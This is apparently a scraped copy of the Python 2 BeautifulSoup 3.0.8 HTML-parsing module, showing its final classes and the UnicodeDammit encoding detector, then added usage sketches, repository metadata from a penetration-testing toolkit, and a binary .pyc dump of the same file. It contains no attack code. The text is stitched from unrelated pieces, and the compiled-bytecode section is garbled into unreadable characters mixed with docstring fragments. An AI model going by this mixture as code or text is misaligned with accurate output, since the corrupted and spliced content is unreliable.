I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! 
It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. # Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. 
CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml', isHTML=False): self.declaredHTMLEncoding = None self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if isinstance(sub, tuple): if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. 
%encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() if isHTML: self.declaredHTMLEncoding = xml_encoding if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = 
            (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
             16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
             128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
             144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
             32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
             38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
             45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
             186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
             195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
             201,202,106,107,108,109,110,111,112,113,114,203,204,205,
             206,207,208,209,126,115,116,117,118,119,120,121,122,210,
             211,212,213,214,215,216,217,218,219,220,221,222,223,224,
             225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
             73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
             82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
             90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
             250,251,252,253,254,255)
            import string
            c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
                ''.join(map(chr, range(256))), ''.join(map(chr, emap)))
        return s.translate(c.EBCDIC_TO_ASCII_MAP)

    MS_CHARS = { '\x80' : ('euro', '20AC'),
                 '\x81' : ' ',
                 '\x82' : ('sbquo', '201A'),
                 '\x83' : ('fnof', '192'),
                 '\x84' : ('bdquo', '201E'),
                 '\x85' : ('hellip', '2026'),
                 '\x86' : ('dagger', '2020'),
                 '\x87' : ('Dagger', '2021'),
                 '\x88' : ('circ', '2C6'),
                 '\x89' : ('permil', '2030'),
                 '\x8A' : ('Scaron', '160'),
                 '\x8B' : ('lsaquo', '2039'),
                 '\x8C' : ('OElig', '152'),
                 '\x8D' : '?',
                 '\x8E' : ('#x17D', '17D'),
                 '\x8F' : '?',
                 '\x90' : '?',
                 '\x91' : ('lsquo', '2018'),
                 '\x92' : ('rsquo', '2019'),
                 '\x93' : ('ldquo', '201C'),
                 '\x94' : ('rdquo', '201D'),
                 '\x95' : ('bull', '2022'),
                 '\x96' : ('ndash', '2013'),
                 '\x97' : ('mdash', '2014'),
                 '\x98' : ('tilde', '2DC'),
                 '\x99' : ('trade', '2122'),
                 '\x9a' : ('scaron', '161'),
                 '\x9b' : ('rsaquo', '203A'),
                 '\x9c' : ('oelig', '153'),
                 '\x9d' : '?',
                 '\x9e' : ('#x17E', '17E'),
                 '\x9f' : ('Yuml', ''),}

#######################################################################


#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
    import sys
    soup = BeautifulSoup(sys.stdin)
    print soup.prettify()
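# ----------------------------------------------------------------------
# Usage sketch (editor's addition, not part of the original module): a
# minimal, hedged illustration of the search and navigation API defined
# above. The markup and the names html, links, story, by_re, link_soup
# are invented for this example.
import re

html = '''<html><body>
<p class="story">Jack &amp; Jill</p>
<a href="http://example.com/one" id="link1">One</a>
<a href="http://example.com/two" id="link2">Two</a>
</body></html>'''

soup = BeautifulSoup(html, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)

# Tag names, attribute maps, keyword arguments, and regexp objects are
# all accepted filters; each ends up in a SoupStrainer via _findAll.
links = soup.findAll('a')                        # every <a> Tag
story = soup.find('p', {'class': 'story'})       # match on attributes
by_re = soup.findAll(href=re.compile('two$'))    # keyword arg + regexp
assert by_re[0]['id'] == 'link2'

# Navigation mirrors the *Generator methods: siblings, parents, next.
assert links[0].findNextSibling('a') is links[1]
assert links[0].findParent('body').name == 'body'

# getText/.text walks the NavigableStrings; &amp; was converted to '&'
# because convertEntities=HTML_ENTITIES was passed above.
print repr(story.text)                           # u'Jack & Jill'

# A SoupStrainer passed as parseOnlyThese keeps the parse tree small by
# discarding, at parse time, everything that does not match.
link_soup = BeautifulSoup(html, parseOnlyThese=SoupStrainer('a'))
print [a['href'] for a in link_soup.findAll('a')]

print soup.prettify()    # same pretty-printer the __main__ block uses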
size: 79,254
language: Python
extension: .py
total_lines: 1,738
avg_line_length: 34.281358
max_line_length: 186
alphanum_fraction: 0.585839
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
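# ----------------------------------------------------------------------
# Encoding sketch (editor's addition): a minimal, hedged example of the
# UnicodeDammit helper defined near the end of BeautifulSoup.py above.
# The byte strings here are invented for illustration.
latin1 = 'Sacr\xe9 bleu!'                  # ISO-8859-1 encoded bytes
dammit = UnicodeDammit(latin1, overrideEncodings=['iso-8859-1'])
print repr(dammit.unicode)                 # u'Sacr\xe9 bleu!'
print dammit.originalEncoding              # iso-8859-1

# windows-1252 smart quotes can be rewritten as HTML entities while the
# document is converted to Unicode; with no encoding hints this input
# typically falls back to the windows-1252 attempt:
quoted = UnicodeDammit('a \x93quoted\x94 word', smartQuotesTo='html')
print repr(quoted.unicode)                 # u'a &ldquo;quoted&rdquo; word'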
id: 18,914
file_name: BeautifulSoup.pyc
file_path: pwnieexpress_raspberry_pwn/src/pentest/plecost/BeautifulSoup.pyc
[binary content omitted: CPython 2 bytecode compiled from BeautifulSoup.py, version 3.0.8 (Leonard Richardson, Copyright (c) 2004-2009, New-style BSD license); its readable strings duplicate the docstrings of the BeautifulSoup.py source above, and the remainder is bytecode that does not survive text extraction]
If encoding is None, returns a Unicode string..RÕis RÃN(R R$R&RkRLR0R§R•(RRZR–R—R_tcR5((s!/pentest/plecost/BeautifulSoup.pyRœs"  cKs=d}|i||||d|ç}|o|d}n|S(sLReturn only the first child of this Tag matching the given criteria.iiN(R Ræ(RR3R4t recursiveR5R6RERF((s!/pentest/plecost/BeautifulSoup.pyR√2s cKs9|i}|p |i}n|i||||||çS(s’Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.(trecursiveChildGeneratortchildGeneratorR8(RR3R4R›R5R:R6RP((s!/pentest/plecost/BeautifulSoup.pyRæ=s  cCs|id|d|d|ÉS(NR5R›R:(Ræ(RR5R›R:((s!/pentest/plecost/BeautifulSoup.pyt fetchTextRscCs|id|d|ÉS(NR5R›(R√(RR5R›((s!/pentest/plecost/BeautifulSoup.pyt firstTextUscCsKt|dÉp4h|_x(|iD]\}}||i|<q#Wn|iS(s^Initializes a map representation of this tag's attributes, if not already initialized.R∑(tgetattrR∑R4(RR≠Rj((s!/pentest/plecost/BeautifulSoup.pyR´Zs   cCs t|iÉS(N(R≤R(R((s!/pentest/plecost/BeautifulSoup.pyRfldsccs]t|iÉp tÇn|iÉi}|id}x ||j o|V|i}q9WdS(Ni(R(RRNR!R (RRßR©((s!/pentest/plecost/BeautifulSoup.pyRfihs   N(6R`RaRbR}RçR RíR R†R°R£tpropertyRmR™R5R¨R¢RR∞R±R≥R¥RµR∂RπRºR¿RqR≈R∆RhR«RsRRRŒRÀRöRkR⁄R€RœRKR√t findChildRæt findChildrentfirsttfetchR‡R·R´RflRfi(((s!/pentest/plecost/BeautifulSoup.pyRLfisl                          T      RJcBsJeZdZdhddÑZdÑZdhdÑZdÑZdÑZRS(sMEncapsulates a number of ways of matching a markup element (tag or text).cKs~||_t|tÉot|É|d<d}n|o.|o|iÉ}|i|Éqh|}n||_||_dS(Ntclass( R3R$R%RR tcopytupdateR4R5(RR3R4R5R6((s!/pentest/plecost/BeautifulSoup.pyR†ws     cCs*|io|iSd|i|ifSdS(Ns%s|%s(R5R3R4(R((s!/pentest/plecost/BeautifulSoup.pyRkÖs c CsÖd}d}t|tÉo|}|}nt|iÉot|tÉ }|i pB|p;|o|i||iÉp| o˛|i||iÉoË|o|i||É}n¶t}d}xñ|iiÉD]Ö\}} |pEt |dÉo |}q*h}x"|D]\} } | || <q Wn|i |É} |i| | Ép t }Pq“q“W|o|o |}q}|}qÅn|S(NR¨( R R$RLtcallableR3t_matchesRKR4RyRR¨Rö( Rt markupNamet markupAttrsRXtmarkuptcallFunctionWithTagDataRët markupAttrMapRpt matchAgainstR{R|t attrValue((s!/pentest/plecost/BeautifulSoup.pyt searchTagãsB       cCsd}t|dÉoQt|tÉ o@x¬|D]1}t|tÉo|i|Éo |}Pq.q.WnÜt|tÉo!|ip|i|É}qÏnUt|tÉpt|tÉo$|i ||iÉo |}qÏnt d|i Ç|S(NR≥s&I don't know how to match against a %s( R RR$RLR&ROR5RÙR%RÏt ExceptionRo(RRÔRXRS((s!/pentest/plecost/BeautifulSoup.pyRO∞s&   cCsTt}|tjo|dj }n.t|Éo||É}nt|tÉo |i}n|o!t|tÉ ot|É}nt |dÉo|o |i |É}nãt |dÉo||j}nkt |dÉo|i |É}nH|o@t|tÉo0t|tÉot|É}q9t |É}n|p||j}n|S(NRëR≥Ry( RöRKR RÎR$RLR3R%R\RROR∞R(RRÔRÚtresult((s!/pentest/plecost/BeautifulSoup.pyRÏÀs,   N( R`RaRbR R†RkRÙRORÏ(((s!/pentest/plecost/BeautifulSoup.pyRJss  % RMcBseZdZdÑZRS(sTA ResultSet is just a list that keeps track of the SoupStrainer that created it.cCstigÉ||_dS(N(RR†tsource(RR˜((s!/pentest/plecost/BeautifulSoup.pyR†Ós (R`RaRbR†(((s!/pentest/plecost/BeautifulSoup.pyRMÎscGsèh}xÇ|D]z}t|dÉo+xa|iÉD]\}}|||<q0Wq t|dÉox&|D]}|||<qeWq |||<q W|S(s±Turns a list of maps, lists, or scalars into a single map. 
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.RyR≥(RRy(RÆRøtbuilttportionR{R|((s!/pentest/plecost/BeautifulSoup.pyt buildTagMapÙs tBeautifulStoneSoupc BsáeZdZhZhZhZhZgZei dÉdÑfei dÉdÑfgZ dZ dZ dZ dZeZhd%d 6d%d 6d%d 6d%d 6d%d 6Zdd%d%ee d%d%edÑZdÑZd%edÑZdÑZdÑZdÑZdÑZdÑZedÑZedÑZdÑZddÑZ dÑZ!dÑZ"dÑZ#dÑZ$d ÑZ%d!ÑZ&d"ÑZ'd#ÑZ(d$ÑZ)RS(&sbThis class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.s (<[^<>]*)/>cCs|idÉdS(is />(Rä(Râ((s!/pentest/plecost/BeautifulSoup.pyRñ"ss<!\s+([^<>]*)>cCsd|idÉdS(s<!iRÜ(Rä(Râ((s!/pentest/plecost/BeautifulSoup.pyRñ$su [document]thtmltxmltxhtmli i i i i RÃc Csk||_||_||_||_|ioöd|_||ijot|_t|_ t|_ q„||i jot|_t|_ t|_ q„||i jot|_t|_ t|_ q„nt|_t|_ t|_ t d|É|_ti|Ét|dÉo|iÉ}n||_||_y|id|ÉWntj onXd|_dS(sVThe Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! 
--Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.treadtisHTMLN(tparseOnlyTheset fromEncodingt smartQuotesTotconvertEntitiesR t HTML_ENTITIESRöRéRKRãRêtXHTML_ENTITIESt XML_ENTITIESR˙tinstanceSelfClosingTagsRR†RRˇRÔt markupMassaget_feedt StopParsing( RRÔRRR RRtselfClosingTagsR((s!/pentest/plecost/BeautifulSoup.pyR†5s@                    cCsWyt|É}Wntj odSXd|jo djnpdS|i|ÉS(s/This method fixes a bug in Python's SGMLParser.Nii(RèR tconvert_codepoint(RR3tn((s!/pentest/plecost/BeautifulSoup.pytconvert_charrefzscCs@|i}t|tÉo!t|dÉp d|_qÇnIt||i|gd|id|É}|i}|i|_|i |_ |og|i oYt|i dÉp|i |_ nx)|i D]\}}|i ||É}q¿W|` qn|i Éti||É|iÉx%|ii|ijo|iÉqWdS(NtoriginalEncodingRRR≥(RÔR$R\RR Rt UnicodeDammitRRtdeclaredHTMLEncodingR tMARKUP_MASSAGERìtresetRtfeedtendDatat currentTagR3t ROOT_TAG_NAMEtpopTag(RtinDocumentEncodingRRÔtdammittfixtm((s!/pentest/plecost/BeautifulSoup.pyR Ñs0        cCsl|idÉp |idÉp|idÉoti||ÉS|idÉpti||ÉStÇdS(sàThis method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.tstart_tend_tdo_R¡N(t startswithRRqRLRn(Rt methodName((s!/pentest/plecost/BeautifulSoup.pyRq•s  cCs#|ii|Ép|ii|ÉS(seReturns true iff the given string is the name of a self-closing tag according to this parser.(tSELF_CLOSING_TAGSR∞R(RR3((s!/pentest/plecost/BeautifulSoup.pyRò≤scCsati|||iÉd|_ti|Ég|_d|_g|_ g|_ |i |ÉdS(Ni( RLR†RRõRRt currentDataR RttagStackt quoteStacktpushTag(R((s!/pentest/plecost/BeautifulSoup.pyR∏s      cCs4|iiÉ}|io|id|_n|iS(Niˇˇˇˇ(R%tpopR(RR/((s!/pentest/plecost/BeautifulSoup.pyR¬s cCsE|io|iii|Én|ii|É|id|_dS(Niˇˇˇˇ(RRR0R%(RR/((s!/pentest/plecost/BeautifulSoup.pyR' s cCsA|io3di|iÉ}|i|iÉdjo\tg}|iD]}||iqF~Éi|iÉ o!d|jo d}qëd}ng|_|i o=t |iÉdjo'|i i p|i i |É odS||É}|i |i|iÉ|io||i_n||_|iii|ÉndS(NuRÃs RÕi(R$R•t translatetSTRIP_ASCII_SPACEStsetR%R3t intersectiontPRESERVE_WHITESPACE_TAGSRR(R5RORRR R RR0(RtcontainerClassR$RRR/to((s!/pentest/plecost/BeautifulSoup.pyR—s& -        cCsπ||ijodSd}d}xVtt|iÉdddÉD]5}||i|ijot|iÉ|}PqAqAW|p|d}nx#td|ÉD]}|iÉ}qüW|S(s‹Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.Niiiˇˇˇˇ(RR R∏R(R%R3R(RR3t inclusivePoptnumPopst mostRecentTagRW((s!/pentest/plecost/BeautifulSoup.pyt _popToTagËs  c Cs!|ii|É}|dj}|ii|É}d}t}x√tt|iÉdddÉD]¢}|i|}| p|i |jo| o |}Pn|dj o|i |jp*|djo1|o*|ii|i Éo|i }t }Pn|i }q\W|o|i ||ÉndS(sÙWe need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. 
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' iiiˇˇˇˇN( t NESTABLE_TAGSR¨R tRESET_NESTING_TAGSR∞RKR∏R(R%R3RöR R3( RR3tnestingResetTriggerst isNestabletisResetNestingtpopTot inclusiveRWtp((s!/pentest/plecost/BeautifulSoup.pyt _smartPop˛s*       icCsÅ|ioVdig}|D]\}}|d||fq~É}|id||fÉdS|iÉ|i|É o| o|i|Én|io?t|iÉdjo)|ii p|ii ||É odSt ||||i |i É}|i o||i _n||_ |i|É|p|i|Éo|iÉn||ijo|ii|Éd|_n|S(NRÃs %s="%s"s<%s%s>i(R&R•t handle_dataRRòR<RR(R%R5RÙRLRR R R'Rt QUOTE_TAGSR0tliteral(RR3R4t selfClosingRRRâtyR/((s!/pentest/plecost/BeautifulSoup.pytunknown_starttag,s* :  $    cCsñ|io*|id|jo|id|ÉdS|iÉ|i|É|io=|id|jo)|iiÉt|iÉdj|_ndS(Niˇˇˇˇs</%s>i(R&R=RR3R(R(R?(RR3((s!/pentest/plecost/BeautifulSoup.pytunknown_endtagJs   cCs|ii|ÉdS(N(R$R0(Rtdata((s!/pentest/plecost/BeautifulSoup.pyR=WscCs(|iÉ|i|É|i|ÉdS(sOAdds a certain piece of text to the tree as a NavigableString subclass.N(RR=(RR5tsubclass((s!/pentest/plecost/BeautifulSoup.pyt_toStringSubclassZs  cCs/|d djo d}n|i|tÉdS(s©Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.iR˝u,xml version='1.0' encoding='%SOUP-ENCODING%'N(RFRu(RR5((s!/pentest/plecost/BeautifulSoup.pyt handle_pias cCs|i|tÉdS(s#Handle comments as Comment objects.N(RFRw(RR5((s!/pentest/plecost/BeautifulSoup.pythandle_commentiscCs;|iott|ÉÉ}n d|}|i|ÉdS(s$Handle character references as data.s&#%s;N(RRåRèR=(RtrefRD((s!/pentest/plecost/BeautifulSoup.pythandle_charrefms  cCs¿d}|io.ytt|É}Wq>tj oq>Xn| o |io|ii|É}n| o,|io"|ii|É od|}n|pd|}n|i|ÉdS(sñHandle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.s&amp;%ss&%s;N( R RãRåRtKeyErrorRéRçR¨R=(RRIRD((s!/pentest/plecost/BeautifulSoup.pythandle_entityrefus  cCs|i|tÉdS(s4Handle DOCTYPEs and the like as Declaration objects.N(RFRx(RRD((s!/pentest/plecost/BeautifulSoup.pyt handle_decl†scCs‚d}|i||d!djog|iid|É}|djot|iÉ}n|i|d|!}|d}|i|tÉnWyti||É}Wn=tj o1|i|}|i |É|t|É}nX|S(s`Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.i s <![CDATA[s]]>iˇˇˇˇiN( R trawdataR√R(RFRtRtparse_declarationRR=(RRWtjR{RDttoHandle((s!/pentest/plecost/BeautifulSoup.pyRO§s    N(*R`RaRbR#R4R5R>R-RRRRRRRt ALL_ENTITIESR R*RKRöR†RR RqRòRRR'R&RR3R<RBRCR=RFRGRHRJRLRMRO(((s!/pentest/plecost/BeautifulSoup.pyR˚ sN   ) C !      .       + t BeautifulSoupc Bs=eZdZdÑZed/d0ÉZed d gÉZhd/d6d/d 6Z d1Z d2Z hgd6gd6ddgd6gd6dgd 6dgd!6Z hgd"6d"d#d$d%gd&6d&gd'6d&gd(6d"gd%6d"gd#6d"gd$6Z d3Zed/e d,ee e ÉZege e e e ÉZeid-eiÉZd.ÑZRS(4s This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. 
Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.cOsB|idÉp|i|d<nt|d<ti|||édS(NRR(R∞RRKR˚R†(RRøR6((s!/pentest/plecost/BeautifulSoup.pyR†Ës tbrthrtinputtimgtmetatspacertlinktframetbasetcoltprettextareatscripttspantfonttqtobjecttbdoRìtsuptcentert blockquotetdivtfieldsettinstdeltoltultlitdltddtdtttablettbodyttfootttheadttrttdtthtaddresstformR;tnoscripts((^|;)\s*charset=)([^;]*)cCsîd}d}d}t}xmtdt|ÉÉD]V}||\}}|iÉ}|djo |}q.|djo|}|}q.q.W|o‘|oÕ|ii|É} | o∞|idj p|i|i jo@dÑ} |ii | |É} ||d| f||<t }q_| i dÉ} | o3| |ijo#| |_|i |iÉtÇq_qcn|id|É} | o|o t | _ndS(s¶Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.is http-equivtcontentcSs|idÉdS(Nis%SOUP-ENCODING%(Rä(Rë((s!/pentest/plecost/BeautifulSoup.pytrewrite>siRXN(R 